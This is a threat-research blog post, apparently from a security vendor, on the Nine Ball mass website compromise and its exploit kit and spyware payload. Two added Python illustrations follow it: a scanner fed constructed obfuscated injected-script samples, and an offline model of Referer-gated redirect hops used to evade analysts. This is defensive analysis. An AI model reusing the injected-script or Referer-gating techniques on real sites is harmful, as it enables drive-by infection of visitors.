The noise around the recent mass compromises has not even died down and already another large-scale attack is under way. Trend Micro was alerted to a new mass compromise, dubbed Nine Ball for the same reason Gumblar was named Gumblar: after the domain that first surfaced in the attack. This time, however, the Nine Ball domain was only one of hundreds of landing pages users could be redirected to.
As reported by Ivan Macalintal, Trend Micro Threat Research Manager, the infection starts when a user accesses a compromised site that automatically redirects the visitor through several sites. These are a trio of malicious domains (specific .KZ and .TW sites) that the attackers use repeatedly to bounce users to a malicious IP address registered in Ukraine.
The chain ends when the user's browser lands on a page containing exploits for vulnerabilities in various software, including Adobe Acrobat and Shockwave Flash. Advanced Threat Researcher Joey Costoya also pointed out that a previously reported proof of concept (PoC) for the Office OCX Word Viewer is among the exploits used in this attack.
Compromised websites were injected with blocks of obfuscated script, detected as JS_DLOADR.ALP (see Figure 1):
A single page can carry as many as seven or eight of these blocks, as can be seen in the snapshot below of a compromised site belonging to a Web hosting provider in Hong Kong. A hosting provider? Yikes!
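As an added illustration (not code from the original post or from Trend Micro), the following Python scanner counts injected script blocks of the kind described above. It flags a `<script>` block when at least two obfuscation indicators co-occur (eval/unescape/fromCharCode/document.write, or long runs of %xx, \xNN or comma-separated character codes) and reports the block's Shannon entropy. The sample page, the indicator list and the threshold are constructed assumptions; the real JS_DLOADR.ALP content is not reproduced here.

```python
import math
import re

# Constructed sample page (not the real JS_DLOADR.ALP code): three injected
# obfuscated script blocks of the kind described above, plus one benign script.
SAMPLE_PAGE = r"""<html><head><title>Hosting Co.</title>
<script type="text/javascript">
function init(){document.getElementById('nav').style.display='block';}
</script>
</head><body onload="init()">
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%3e%27%29'));</script>
<div id="nav">Welcome</div>
<script>var a="\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65";eval(a+"('')");</script>
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,104,111,115,116,46,105,110,118,97,108,105,100,47,34,62));</script>
</body></html>
"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

# Heuristic indicators of an injected, obfuscated downloader block. Each one alone
# is common in legitimate code; requiring several to co-occur keeps false positives down.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode\s*\("),
    "document.write": re.compile(r"document\.write\s*\("),
    "percent_escapes": re.compile(r"(?:%[0-9a-fA-F]{2}){8,}"),      # '%64%6f...'
    "hex_escapes": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),        # '\x64\x6f...'
    "charcode_list": re.compile(r"(?:\d{2,3}\s*,\s*){8,}"),         # '60,105,102,...'
}


def shannon_entropy(text: str) -> float:
    """Bits per character; encoded/packed script sits well above plain JavaScript."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def find_injected_scripts(html: str, min_indicators: int = 2) -> list:
    """Return one record per suspicious <script> block, in page order."""
    hits = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        found = [name for name, rx in INDICATORS.items() if rx.search(body)]
        if len(found) >= min_indicators:
            hits.append({
                "offset": m.start(),
                "indicators": found,
                "entropy": round(shannon_entropy(body), 2),
                "snippet": body.strip()[:60],
            })
    return hits


def count_injected_blocks(html: str) -> int:
    """The number the analyst wants first: how many blocks were injected into the page."""
    return len(find_injected_scripts(html))


if __name__ == "__main__":
    for hit in find_injected_scripts(SAMPLE_PAGE):
        print(f"offset {hit['offset']:5d}  entropy {hit['entropy']:.2f}  "
              f"{', '.join(hit['indicators'])}\n    {hit['snippet']}...")
    print("injected blocks:", count_injected_blocks(SAMPLE_PAGE))
```

Run it over a saved copy of a suspect page (or pipe in the output of a crawler); the benign `init()` script trips none of the indicators, while the three injected blocks trip two or three each.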
The user is then redirected through a series of websites that check the HTTP Referer header to avoid detection and subsequent removal: each hop serves its redirect only to requests arriving from the previous one, so a URL fetched out of sequence, without the expected Referer, does not reveal the malicious content. The infection chain ends when the user is finally redirected to an exploit-laden landing page.
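To show why the gating matters to an analyst, here is an added, offline model of such a referrer-gated chain (example code, not the real Nine Ball infrastructure or Trend Micro's tooling). The hostnames, the TEST-NET address and the handler logic are all constructed. Each hop is modelled as a script/iframe redirect, so the next request carries the page that issued it as Referer (an HTTP 3xx redirect would instead pass the original Referer along); the landing page answers 404 unless reached through the chain.

```python
import re

# Constructed chain: made-up hosts (.invalid) and a TEST-NET-2 address standing in
# for the malicious IP. None of this is the real infrastructure.
START = "http://compromised-site.invalid/index.html"
LANDING = "http://198.51.100.10/exploit/index.php"
EXPLOIT_BODY = "<html><!-- pdf/swf exploit objects would be embedded here --></html>"


def redirector(target):
    """The compromised site: its injected script forwards every visitor."""
    def handle(referer):
        return 200, f'<script>document.location="{target}"</script>'
    return handle


def gated(expected_referer, target):
    """Intermediate hop: forwards only when reached from the expected previous hop."""
    def handle(referer):
        if referer != expected_referer:
            return 404, "Not Found"
        return 200, f'<iframe src="{target}" width="0" height="0"></iframe>'
    return handle


def landing(expected_referer):
    """Exploit page: served only to visitors that arrived through the last hop."""
    def handle(referer):
        if referer != expected_referer:
            return 404, "Not Found"
        return 200, EXPLOIT_BODY
    return handle


SERVERS = {
    START: redirector("http://hop1.invalid/in.php"),
    "http://hop1.invalid/in.php": gated(START, "http://hop2.invalid/go.php"),
    "http://hop2.invalid/go.php": gated("http://hop1.invalid/in.php", "http://hop3.invalid/x.php"),
    "http://hop3.invalid/x.php": gated("http://hop2.invalid/go.php", LANDING),
    LANDING: landing("http://hop3.invalid/x.php"),
}


def fetch(url, referer=None):
    """Stand-in for an HTTP client: (status, body) for url sent with the given Referer."""
    handler = SERVERS.get(url)
    return handler(referer) if handler else (404, "Not Found")


# Where the next hop is embedded: a script-driven location change or a hidden iframe.
NEXT_HOP_RE = re.compile(r'(?:document\.location\s*=\s*"|<iframe[^>]*\bsrc=")([^"]+)"')


def follow_chain(start_url, max_hops=10, fetch=fetch):
    """Emulate a browser walking the chain. Each embedded hop is requested with the
    page that issued it as Referer. Returns [(url, referer, status), ...]."""
    trail, url, referer = [], start_url, None
    for _ in range(max_hops):
        status, body = fetch(url, referer)
        trail.append((url, referer, status))
        m = NEXT_HOP_RE.search(body) if status == 200 else None
        if not m:
            break
        url, referer = m.group(1), url
    return trail


if __name__ == "__main__":
    for url, ref, status in follow_chain(START):
        print(f"{status} {url}  (Referer: {ref})")
    print("direct fetch of landing page:", fetch(LANDING)[0])
```

The walk from the compromised site reaches the exploit page with a 200 at every hop, while fetching the landing page (or any intermediate hop) directly returns 404. The practical lesson for takedown and analysis work is to replay the full chain with the Referer each hop expects rather than requesting the final URL on its own.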
The final pages in the infection chain, Costoya also reported, are part of a Web exploit toolkit called Yes Exploit System, which includes .PDF and .SWF exploits detected as TROJ_PDFEX.J and TROJ_SWFLDR.AB, respectively.
Both the .PDF and the .SWF file download a binary payload that resembles a new kind of information stealer, detected as TSPY_SILENTBAN.U. TSPY_SILENTBAN.U installs itself as a Browser Helper Object (BHO) on the affected system and monitors Internet activity. BHOs load inside Internet Explorer and are registered under HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects, which is where an unfamiliar CLSID can be spotted on a suspect machine. The gathered information is then sent to a remote user via HTTP POST.
Note that as of this writing, the binary payload retrieved from the attack is this spyware. The payload is easily swapped, however, so future attacks may well deliver something else.
Information on the vulnerabilities exploited in this attack can be found on the following pages:
Users are also strongly advised to update their software in order to avoid being affected by this attack.